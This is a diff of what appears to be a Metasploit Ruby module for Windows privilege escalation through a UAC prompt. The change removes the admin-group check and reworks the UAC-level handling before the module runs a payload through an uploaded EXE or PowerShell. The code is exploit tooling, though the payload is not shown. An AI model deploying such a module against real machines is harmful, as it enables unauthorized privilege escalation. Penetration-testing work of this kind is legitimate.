@@ -45,53 +45,29 @@ def initialize(info={})
4545
4646 end
4747
48- def check
49- session . readline
50- print_status ( 'Checking admin status...' )
51- admin_group = is_in_admin_group?
52- if admin_group . nil?
53- print_error ( 'Either whoami is not there or failed to execute' )
54- print_error ( 'Continuing under assumption you already checked...' )
55- return Exploit ::CheckCode ::Unknown
56- else
57- if admin_group
58- print_good ( 'Part of Administrators group! Continuing...' )
59- return Exploit ::CheckCode ::Vulnerable
60- else
61- print_error ( "Not in admins group, cannot escalate with this module" )
62- return Exploit ::CheckCode ::Safe
63- end
64- end
65- end
66-
6748 def exploit
68- admin_check = check
69- if admin_check . join =~ /safe/
70- fail_with ( Exploit ::Failure ::NoAccess , "Not in admins group, cannot escalate with this module" )
71- end
49+
7250 if is_uac_enabled?
7351 print_status "UAC is Enabled, checking level..."
74- else
75- if is_in_admin_group?
76- fail_with ( Exploit ::Failure ::Unknown , "UAC is disabled and we are in the admin group so something has gone wrong..." )
77- else
78- fail_with ( Exploit ::Failure ::NoAccess , "Not in admins group, cannot escalate with this module" )
79- end
80- end
81- case get_uac_level
52+ case get_uac_level
8253 when UAC_NO_PROMPT
8354 print_good "UAC is not enabled, no prompt for the user"
8455 else
8556 print_status "The user will be prompted, wait for them to click 'Ok'"
57+ end
58+ else
59+ print_good "UAC is not enabled, no prompt for the user"
8660 end
61+
8762 #
8863 # Generate payload and random names for upload
8964 #
9065 case datastore [ "TECHNIQUE" ]
91- when "EXE"
92- execute_exe ( datastore [ "FILENAME" ] , datastore [ "PATH" ] , datastore [ "UPLOAD" ] )
93- when "PSH"
94- execute_psh
66+ when "EXE"
67+ execute_exe ( datastore [ "FILENAME" ] , datastore [ "PATH" ] , datastore [ "UPLOAD" ] )
68+ when "PSH"
69+ execute_psh
9570 end
9671 end
9772end
73+
0 commit comments